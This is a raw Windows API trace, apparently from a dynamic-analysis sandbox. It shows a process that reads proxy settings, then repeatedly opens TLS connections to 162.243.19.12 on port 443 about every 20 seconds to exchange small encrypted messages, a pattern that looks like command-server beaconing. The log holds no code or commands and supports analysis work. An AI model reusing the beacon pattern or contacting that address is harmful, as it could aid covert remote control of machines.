	[0417.083] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23c3ff90, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23c43870, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23c43870, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0417.084] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf950 | out: pvContextBuffer=0x2ad3badf950) returned 0x0
	[0417.084] send (in: s=0x7d0, buf=0x2ad23c43940*, len=333, flags=0 | out: buf=0x2ad23c43940*) returned 333
	[0417.084] recv (in: s=0x7d0, buf=0x2ad23c43940, len=5, flags=0 | out: buf=0x2ad23c43940*) returned 5
	[0417.190] recv (in: s=0x7d0, buf=0x2ad23c43945, len=49, flags=0 | out: buf=0x2ad23c43945*) returned 49
	[0417.190] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23c3ff90, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c43b80, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c43ba0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c43ba0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0417.190] recv (in: s=0x7d0, buf=0x2ad23c43c90, len=5, flags=0 | out: buf=0x2ad23c43c90*) returned 5
	[0417.190] recv (in: s=0x7d0, buf=0x2ad23c43cb5, len=1, flags=0 | out: buf=0x2ad23c43cb5*) returned 1
	[0417.190] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23c3ff90, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c43d88, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c43da8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c43da8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0417.191] recv (in: s=0x7d0, buf=0x2ad23c43e98, len=5, flags=0 | out: buf=0x2ad23c43e98*) returned 5
	[0417.191] recv (in: s=0x7d0, buf=0x2ad23c43ebd, len=48, flags=0 | out: buf=0x2ad23c43ebd*) returned 48
	[0417.191] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23c3ff90, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c43fc0, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23c43fe0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23c43fe0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0417.192] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3920 | out: pvContextBuffer=0x2ad3bad3920) returned 0x0
	[0417.192] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23c44128 | out: pBuffer=0x2ad23c44128) returned 0x0
	[0417.193] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23c44180 | out: pBuffer=0x2ad23c44180) returned 0x0
	[0417.193] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23c441e8 | out: pBuffer=0x2ad23c441e8) returned 0x0
	[0417.193] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05e50) returned 0x2ad3bb05e50
	[0417.194] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0417.194] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb05e50
	[0417.194] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05e50) returned 0x2ad3bb05e50
	[0417.194] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb05e50) returned 0x0
	[0417.195] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0417.195] CertFreeCertificateContext (pCertContext=0x2ad3bb05e50) returned 1
	[0417.196] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0417.196] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb05e50, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0417.196] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb05e50, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0417.198] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0417.200] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05e50) returned 0x2ad3bb05e50
	[0417.201] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0417.202] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0417.202] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0417.202] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0417.203] SetLastError (dwErrCode=0x0) 
	[0417.203] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0417.203] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0417.203] CertFreeCertificateContext (pCertContext=0x2ad3bb05e50) returned 1
	[0417.203] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23c46df0, MessageSeqNo=0x0 | out: pMessage=0x2ad23c46df0) returned 0x0
	[0417.204] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9fe0
	[0417.204] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9fe0*=((len=0x3b, buf=0x2ad23c440b0*), (len=0xd5, buf=0x2ad23c46bf8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9fe0*=((len=0x3b, buf=0x2ad23c440b0*), (len=0xd5, buf=0x2ad23c46bf8*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0417.204] CoTaskMemFree (pv=0x2ad3bac9fe0) 
	[0417.204] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0417.204] recv (in: s=0x7d0, buf=0x2ad23c46f98, len=5, flags=0 | out: buf=0x2ad23c46f98*) returned 5
	[0417.695] recv (in: s=0x7d0, buf=0x2ad23c46fbd, len=1488, flags=0 | out: buf=0x2ad23c46fbd*) returned 1488
	[0417.695] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23c476a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c476a0, pfQOP=0x0) returned 0x0
	[0417.695] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0417.696] SetEvent (hEvent=0x6b8) returned 1
	[0417.726] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0435.728] CloseHandle (hObject=0x388) returned 1
	[0435.836] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0435.836] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x164) returned 0x0
	[0435.837] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0435.837] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0435.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0xe4) returned 0x0
	[0435.837] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x25c
	[0435.837] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x25c, fAsynchronous=1) returned 0x0
	[0435.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x270) returned 0x0
	[0435.837] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0435.837] RegNotifyChangeKeyValue (hKey=0x270, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0435.837] GetCurrentProcess () returned 0xffffffffffffffff
	[0435.837] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x3f4) returned 1
	[0435.837] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19ac0
	[0435.838] WinHttpSetTimeouts (hInternet=0x2ad3bb19ac0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0435.838] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0435.853] SetEvent (hEvent=0x6b8) returned 1
	[0435.854] select (in: nfds=0, readfds=0x2ad23c4f098, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23c4f098, writefds=0x0, exceptfds=0x0) returned 1
	[0435.854] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0435.855] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0435.856] shutdown (s=0x7d0, how=2) returned 0
	[0435.856] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0435.857] closesocket (s=0x7d0) returned 0
	[0435.857] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0435.858] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d4
	[0435.858] WSAConnect (in: s=0x7d0, name=0x2ad23c50830*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0435.973] closesocket (s=0x9d4) returned 0
	[0435.974] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23c4d7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23c510b8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23c510b8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0435.974] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfda0 | out: pvContextBuffer=0x2ad3badfda0) returned 0x0
	[0435.974] send (in: s=0x7d0, buf=0x2ad23c51188*, len=333, flags=0 | out: buf=0x2ad23c51188*) returned 333
	[0435.975] recv (in: s=0x7d0, buf=0x2ad23c51188, len=5, flags=0 | out: buf=0x2ad23c51188*) returned 5
	[0436.084] recv (in: s=0x7d0, buf=0x2ad23c5118d, len=61, flags=0 | out: buf=0x2ad23c5118d*) returned 61
	[0436.085] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23c4d7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c513c8, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c513e8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c513e8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0436.085] recv (in: s=0x7d0, buf=0x2ad23c514d8, len=5, flags=0 | out: buf=0x2ad23c514d8*) returned 5
	[0436.085] recv (in: s=0x7d0, buf=0x2ad23c514fd, len=1575, flags=0 | out: buf=0x2ad23c514fd*) returned 1575
	[0436.085] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23c4d7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c51bf8, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c51c18, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c51c18, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0436.086] recv (in: s=0x7d0, buf=0x2ad23c51d08, len=5, flags=0 | out: buf=0x2ad23c51d08*) returned 5
	[0436.086] recv (in: s=0x7d0, buf=0x2ad23c51d2d, len=331, flags=0 | out: buf=0x2ad23c51d2d*) returned 331
	[0436.087] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23c4d7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c51f48, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23c51f68, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23c51f68, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x90312
	[0436.087] recv (in: s=0x7d0, buf=0x2ad23c52058, len=5, flags=0 | out: buf=0x2ad23c52058*) returned 5
	[0436.087] recv (in: s=0x7d0, buf=0x2ad23c5207d, len=4, flags=0 | out: buf=0x2ad23c5207d*) returned 4
	[0436.087] InitializeSecurityContextW (in: phCredential=0xd7ef71b270, phContext=0xd7ef71b520, pTargetName=0x2ad23c4d7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c52158, Reserved2=0x0, phNewContext=0xd7ef71b260, pOutput=0x2ad23c52178, pfContextAttr=0xd7ef71b258, ptsExpiry=0xd7ef71b250 | out: phNewContext=0xd7ef71b260, pOutput=0x2ad23c52178, pfContextAttr=0xd7ef71b258, ptsExpiry=0xd7ef71b250) returned 0x90312
	[0436.092] FreeContextBuffer (in: pvContextBuffer=0x2ad3bab38a0 | out: pvContextBuffer=0x2ad3bab38a0) returned 0x0
	[0436.092] send (in: s=0x7d0, buf=0x2ad23c52248*, len=134, flags=0 | out: buf=0x2ad23c52248*) returned 134
	[0436.092] recv (in: s=0x7d0, buf=0x2ad23c52248, len=5, flags=0 | out: buf=0x2ad23c52248*) returned 5
	[0436.197] recv (in: s=0x7d0, buf=0x2ad23c5230d, len=218, flags=0 | out: buf=0x2ad23c5230d*) returned 218
	[0436.198] InitializeSecurityContextW (in: phCredential=0xd7ef71b1b0, phContext=0xd7ef71b460, pTargetName=0x2ad23c4d7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c524b8, Reserved2=0x0, phNewContext=0xd7ef71b1a0, pOutput=0x2ad23c524d8, pfContextAttr=0xd7ef71b198, ptsExpiry=0xd7ef71b190 | out: phNewContext=0xd7ef71b1a0, pOutput=0x2ad23c524d8, pfContextAttr=0xd7ef71b198, ptsExpiry=0xd7ef71b190) returned 0x90312
	[0436.198] recv (in: s=0x7d0, buf=0x2ad23c525c8, len=5, flags=0 | out: buf=0x2ad23c525c8*) returned 5
	[0436.198] recv (in: s=0x7d0, buf=0x2ad23c525ed, len=1, flags=0 | out: buf=0x2ad23c525ed*) returned 1
	[0436.199] InitializeSecurityContextW (in: phCredential=0xd7ef71b0f0, phContext=0xd7ef71b3a0, pTargetName=0x2ad23c4d7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c526c0, Reserved2=0x0, phNewContext=0xd7ef71b0e0, pOutput=0x2ad23c526e0, pfContextAttr=0xd7ef71b0d8, ptsExpiry=0xd7ef71b0d0 | out: phNewContext=0xd7ef71b0e0, pOutput=0x2ad23c526e0, pfContextAttr=0xd7ef71b0d8, ptsExpiry=0xd7ef71b0d0) returned 0x90312
	[0436.199] recv (in: s=0x7d0, buf=0x2ad23c527d0, len=5, flags=0 | out: buf=0x2ad23c527d0*) returned 5
	[0436.199] recv (in: s=0x7d0, buf=0x2ad23c527f5, len=48, flags=0 | out: buf=0x2ad23c527f5*) returned 48
	[0436.199] InitializeSecurityContextW (in: phCredential=0xd7ef71b030, phContext=0xd7ef71b2e0, pTargetName=0x2ad23c4d7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c528f8, Reserved2=0x0, phNewContext=0xd7ef71b020, pOutput=0x2ad23c52918, pfContextAttr=0xd7ef71b018, ptsExpiry=0xd7ef71b010 | out: phNewContext=0xd7ef71b020, pOutput=0x2ad23c52918, pfContextAttr=0xd7ef71b018, ptsExpiry=0xd7ef71b010) returned 0x0
	[0436.200] QueryContextAttributesW (in: phContext=0xd7ef71b290, ulAttribute=0x4, pBuffer=0x2ad23c52a08 | out: pBuffer=0x2ad23c52a08) returned 0x0
	[0436.200] QueryContextAttributesW (in: phContext=0xd7ef71b290, ulAttribute=0x5a, pBuffer=0x2ad23c52a60 | out: pBuffer=0x2ad23c52a60) returned 0x0
	[0436.200] QueryContextAttributesW (in: phContext=0xd7ef71b140, ulAttribute=0x53, pBuffer=0x2ad23c52ac8 | out: pBuffer=0x2ad23c52ac8) returned 0x0
	[0436.201] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05150) returned 0x2ad3bb05150
	[0436.202] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0436.202] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb05150
	[0436.202] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05150) returned 0x2ad3bb05150
	[0436.203] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb05150) returned 0x0
	[0436.203] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0436.204] CertFreeCertificateContext (pCertContext=0x2ad3bb05150) returned 1
	[0436.205] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0436.205] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb05150, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0436.206] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb05150, pTime=0xd7ef71b148, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b150, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b140 | out: ppChainContext=0xd7ef71b140) returned 1
	[0436.207] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0436.209] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05150) returned 0x2ad3bb05150
	[0436.211] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0436.212] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0436.212] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0436.212] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b2c8, pPolicyStatus=0xd7ef71b2a8 | out: pPolicyStatus=0xd7ef71b2a8) returned 1
	[0436.212] SetLastError (dwErrCode=0x0) 
	[0436.213] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b3a0, pPolicyStatus=0xd7ef71b388 | out: pPolicyStatus=0xd7ef71b388) returned 1
	[0436.213] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0436.214] CertFreeCertificateContext (pCertContext=0x2ad3bb05150) returned 1
	[0436.214] EncryptMessage (in: phContext=0xd7ef71b9b0, fQOP=0x0, pMessage=0x2ad23c55660, MessageSeqNo=0x0 | out: pMessage=0x2ad23c55660) returned 0x0
	[0436.214] send (in: s=0x7d0, buf=0x2ad23c55468*, len=213, flags=0 | out: buf=0x2ad23c55468*) returned 213
	[0436.215] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0436.215] recv (in: s=0x7d0, buf=0x2ad23c55758, len=5, flags=0 | out: buf=0x2ad23c55758*) returned 5
	[0436.738] recv (in: s=0x7d0, buf=0x2ad23c5577d, len=1488, flags=0 | out: buf=0x2ad23c5577d*) returned 1488
	[0436.739] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23c55e60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c55e60, pfQOP=0x0) returned 0x0
	[0436.739] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0436.739] SetEvent (hEvent=0x6b8) returned 1
	[0436.793] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0456.804] CloseHandle (hObject=0x388) returned 1
	[0456.892] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0456.892] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x164) returned 0x0
	[0456.892] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0456.892] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0456.893] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0xe4) returned 0x0
	[0456.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x25c
	[0456.893] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x25c, fAsynchronous=1) returned 0x0
	[0456.893] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x270) returned 0x0
	[0456.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0456.893] RegNotifyChangeKeyValue (hKey=0x270, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0456.894] GetCurrentProcess () returned 0xffffffffffffffff
	[0456.894] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x3f4) returned 1
	[0456.894] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19ce0
	[0456.895] WinHttpSetTimeouts (hInternet=0x2ad3bb19ce0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0456.895] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0456.909] SetEvent (hEvent=0x6b8) returned 1
	[0456.910] select (in: nfds=0, readfds=0x2ad23b49340, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b49340, writefds=0x0, exceptfds=0x0) returned 1
	[0456.910] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0456.912] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0456.913] shutdown (s=0x7d0, how=2) returned 0
	[0456.913] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0456.913] closesocket (s=0x7d0) returned 0
	[0456.914] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0456.914] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d4
	[0456.914] WSAConnect (in: s=0x7d0, name=0x2ad23b4aad8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0457.040] closesocket (s=0x9d4) returned 0
	[0457.040] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b47a80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b4b360, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b4b360, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0457.042] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf7e0 | out: pvContextBuffer=0x2ad3badf7e0) returned 0x0
	[0457.042] send (in: s=0x7d0, buf=0x2ad23b4b430*, len=333, flags=0 | out: buf=0x2ad23b4b430*) returned 333
	[0457.042] recv (in: s=0x7d0, buf=0x2ad23b4b430, len=5, flags=0 | out: buf=0x2ad23b4b430*) returned 5
	[0457.148] recv (in: s=0x7d0, buf=0x2ad23b4b435, len=49, flags=0 | out: buf=0x2ad23b4b435*) returned 49
	[0457.149] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b47a80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b4b670, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b4b690, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b4b690, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0457.149] recv (in: s=0x7d0, buf=0x2ad23b4b780, len=5, flags=0 | out: buf=0x2ad23b4b780*) returned 5
	[0457.149] recv (in: s=0x7d0, buf=0x2ad23b4b7a5, len=1, flags=0 | out: buf=0x2ad23b4b7a5*) returned 1
